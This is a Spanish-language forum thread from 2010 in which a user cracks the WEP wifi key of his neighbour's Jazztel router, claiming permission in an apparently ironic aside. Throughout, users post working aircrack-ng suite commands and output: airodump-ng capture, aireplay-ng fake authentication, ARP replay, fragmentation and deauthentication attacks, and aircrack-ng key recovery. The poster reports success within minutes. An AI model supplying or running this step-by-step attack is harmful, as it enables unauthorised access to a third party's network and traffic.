ATAQUE WIFI BÁSICO
Hola a todos, hoy me he propuesto crackear la contraseña del wifi, de mi vecino, que por supuesto tengo permiso, me he informado, he leido, he estudiado y he llegado a la conclusion del siguiente ataque:
Primero de todo analizo el perimetro de redes wifi:
airodump-ng mon0 CH 11 ][ Elapsed: 1 min ][ 2010-06-24 17:22
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:___________ -49 33 29 0 1 54e. WEP WEP OPN WLAN_____
00:15:___________-82 46 0 0 11 54 WEP WEP Jazztel ______
BSSID STATION PWR Rate Lost Packets Probes
00:22:___________ 00:08:___________ 0 1e- 1e 606 156 WLAN______
Bieeen tengo la red que yo queria crackear, en mi caso Jazztel _____, por tanto me centro en su canal de comunicacion:
airodump-ng -w wep -c 11 --bssid 00:15:___________ mon0Y empiezo a ver sus datos concretos:
CH 11 ][ Elapsed: 5 mins ][ 2010-06-24 17:29 ][ fixed channel mon0: 1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:15:___________ -80 4 1830 0 0 11 54 WEP WEP OPN Jazztel ___
BSSID STATION PWR Rate Lost Packets Probes
00:15:___________ 00:08:___________ 0 1 - 1 0 9
Ahora empieza el ataque para comenzar a capturar paquetes, para lo cual, primero tengo que inyectarle y hacer una autentificación falsa:
aireplay-ng -1 0 -a 00:15:___________ mon0Y la asociacion de AP transcurre satisfactoriamente:
No source MAC (-h) specified. Using the device MAC (00:08:___________)
17:28:02 Waiting for beacon frame (BSSID: 00:15:___________) on channel 11
17:28:02 Sending Authentication Request (Open System) [ACK]
17:28:02 Authentication successful
17:28:02 Sending Association Request [ACK]
17:28:02 Association successful :-) (AID: 1)
Ahora empieza la captura de trafico y arp:
aireplay-ng -3 -b 00:15:___________ mon0No source MAC (-h) specified. Using the device MAC (00:08:___________)
17:25:46 Waiting for beacon frame (BSSID: 00:15:___________) on channel 11
Saving ARP requests in replay_arp-0624-172546.cap
You should also start airodump-ng to capture replies.
2007 packets (got 0 ARP requests and 20 ACKs), sent 0 packets...(0 pps)
Y por mucho que espero no suben los data, estudiando la situación he llegado a la conclusion de que esto ocurre porque no hay ningun cliente asociado que genere trafico de red, y creo que eso se hace en el punto dos de mi ataque, lo que ocurre es que me autentifico falso y al rato me kickea de la falsa autentificación.
Esto es una guia de ataque básico y al mismo tiempo mi duda.
Alguien sabe como puedo solventar este problema sin tener que esperar a que mi vecino empieze a navegar/descargar, en general usar su red?
Saludos y gracias por vuestra atención.
hola ;D
despues de ataque 1 autenticacion falsa prueba ataque 5 de fragmentacion asi:
aireplay-ng -1 0 -a(bssid) -h 00:11:22:33:44:55 -e(essid) wlan0
debe salir la carita feliz y aparece OPEN debajo de auth
aireplay-ng -5 -b(mac del AP) -h 00:11:22:33:44:55 wlan0
................
................
si no funciona cambia el ataque 5 por el 0 :
aireplay-ng -0 5 -a (bssid) wlan0
aircrack-ng -n 64 -b (bssid) archivo-01.cap
................
me avisas como te fue
gracias
Cita de: jcrack en 24 Junio 2010, 22:47 PM
hola ;D
despues de ataque 1 autenticacion falsa prueba ataque 5 de fragmentacion asi:
aireplay-ng -1 0 -a(bssid) -h 00:11:22:33:44:55 -e(essid) wlan0
debe salir la carita feliz y aparece OPEN debajo de auth
aireplay-ng -5 -b(mac del AP) -h 00:11:22:33:44:55 wlan0
................
................
si no funciona cambia el ataque 5 por el 0 :
aireplay-ng -0 5 -a (bssid) wlan0
aircrack-ng -n 64 -b (bssid) archivo-01.cap
................
me avisas como te fue
gracias
Lo de open ya me salia, pero no ocurria nada mas.
Saludos
para generar tráfico con nuestra propia tarjeta deberemos echar mano del tuto que Heavyloto ya publicó en su día para tal fin, y nosotros vamos a usar ahora.
Una vez empezado todo el proceso y viendo que no suben las datas, debemos fijarnos si hay clientes conectados. En caso afirmativo debemos asociarnos con un cliente y para ello abriremos Shell y escribiremos en la misma:
Código:
aireplay-ng -3 –b (Mac víctima) –h (Mac cliente) (las siglas de nuestra interface)
Esto es un A3. Reinyección de petición ARP.
Una vez presionemos enter, veremos como en algunos casos, las datas comienzan a moverse, en ocasiones de una forma escandalosa, pero es lo que queremos no?. Falta aclarar que es posible que tardemos en capturar peticiones ARP, y este factor es mas que IMPORTANTE, ya que necesitamos de ellas, y si no hay tráfico el ataque no resultará efectivo.
En el caso de que no haya ningún cliente, o aunque lo haya, no exista tráfico entre el AP y el cliente, deberemos generarlo nosotros mismos, utilizando para ello nuestra propia tarjeta. Para esto abrimos Shell, y escribiremos lo siguiente:
Código:
aireplay-ng -1 30 –o 1 –e (nombre del Ap) –a (Mac victima) –h (nuestra Mac) (nuestra interface)
Ahora hemos lanzado un A1. Ataque 1. Autentificación falsa
Esto hace que nosotros mismos nos asociemos como un cliente, y solo nos queda repetir el primer ataque, pues ahora ya hay cliente, nosotros mismos.
fuente:http://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html (http://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html)
Suerte.
Conseguido, en poco menos de 5 minutos madre mia...
solo que a veces consigo que suban a velocidad bestial los ivs y otrs veces tengo que hacer la falsa autentificacion y posteriormente un aireplay-ng -3 para conseguir trafico de red.
Saludos